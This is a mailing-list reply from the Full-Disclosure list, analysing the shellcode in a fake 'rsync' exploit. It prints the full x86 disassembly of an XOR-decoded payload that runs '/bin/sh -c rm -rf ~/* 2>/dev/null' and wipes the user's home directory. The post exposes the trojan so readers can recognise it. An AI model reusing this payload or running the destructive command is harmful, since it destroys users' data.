Re: [Full-Disclosure] new rsync :) exploit rsync-too-open

From: Blue Boar (BlueBoar_at_thievco.com)
Date: 05/29/04

  • Next message: Jirka Kosina: "[Full-Disclosure] Re: Linux Kernel sctp_setsockopt() Integer Overflow" 
    To: dkey <dk.dbox2@gmx.net>
Date: Fri, 28 May 2004 17:04:10 -0700

    dkey wrote:

    > "nice mail"...but if somebody wants to use it, check the shellcode first...i
    > think it deletes all your files in your home dir. i'm not sure, maybe
    > somebody else can check it...

    Yes.

    seg000:00000000 ; Segment type: Pure code
    seg000:00000000 seg000 segment byte public 'CODE' use32
    seg000:00000000 assume cs:seg000
    seg000:00000000 assume es:nothing, ss:nothing,
    ds:nothing, fs:nothing, gs:nothing
    seg000:00000000 jmp short loc_12
    seg000:00000002
    seg000:00000002 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E
    ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
    seg000:00000002
    seg000:00000002
    seg000:00000002 sub_2 proc near ; CODE XREF:
    sub_2+10p
    seg000:00000002 pop esi ; ESI = addr of decode section
    seg000:00000003 xor ecx, ecx ; ECX = 0
    seg000:00000005 mov cl, 75 ; loop 75 times
    seg000:00000007 mov al, 255 ; XOR value start
    seg000:00000009
    seg000:00000009 decode_loop: ; CODE XREF:
    sub_2+Cj
    seg000:00000009 xor [esi], al ; XOR current
    byte in decode section with AL
    seg000:0000000B dec al ; AL = AL - 1
    seg000:0000000D inc esi ; next byte
    seg000:0000000E loop decode_loop
    seg000:00000010 jmp short decoded
    seg000:00000012 ;
    ---------------------------------------------------------------------------
    seg000:00000012
    seg000:00000012 loc_12: ; CODE XREF: seg000:00000000j
    seg000:00000012 call sub_2 ; push addr of decode section
    seg000:00000017
    seg000:00000017 decoded: ; CODE XREF: sub_2+Ej
    seg000:00000017 call loc_41 ; push addr of "\bin\sh"
    seg000:00000017 ;
    ---------------------------------------------------------------------------
    seg000:0000001C aBinSh db '/bin/sh',0
    seg000:00000024 aSh db 'sh',0
    seg000:00000027 aC db '-c',0
    seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0
    seg000:00000041 ;
    ---------------------------------------------------------------------------
    seg000:00000041
    seg000:00000041 loc_41: ; CODE XREF: sub_2+15p
    seg000:00000041 pop ebp ; EBP = addr of "\bin\sh"
    seg000:00000042 xor eax, eax ; EAX = 0
    seg000:00000042 sub_2 endp
    seg000:00000042
    seg000:00000044 push eax ; 0
    seg000:00000045 lea ebx, [ebp+0Eh]
    seg000:00000048 push ebx ; "'rm -rf ~/* 2>/dev/null"
    seg000:00000049 lea ebx, [ebp+0Bh]
    seg000:0000004C push ebx ; "-c"
    seg000:0000004D lea ebx, [ebp+8]
    seg000:00000050 push ebx ; "sh"
    seg000:00000051 mov ebx, ebp ; "/bin/sh"
    seg000:00000053 mov ecx, esp
    seg000:00000055 xor edx, edx ; EDX = 0
    seg000:00000057 mov al, 0Bh
    seg000:00000059 int 80h ; LINUX - sys_execve
    seg000:0000005B mov ebx, eax ; EBX = result
    seg000:0000005D xor eax, eax
    seg000:0000005F inc eax ; exit (1)
    seg000:00000060 int 80h ; LINUX - sys_exit
    seg000:00000060 seg000 ends
    seg000:00000060 end

    AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"

                                                    BB

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Jirka Kosina: "[Full-Disclosure] Re: Linux Kernel sctp_setsockopt() Integer Overflow"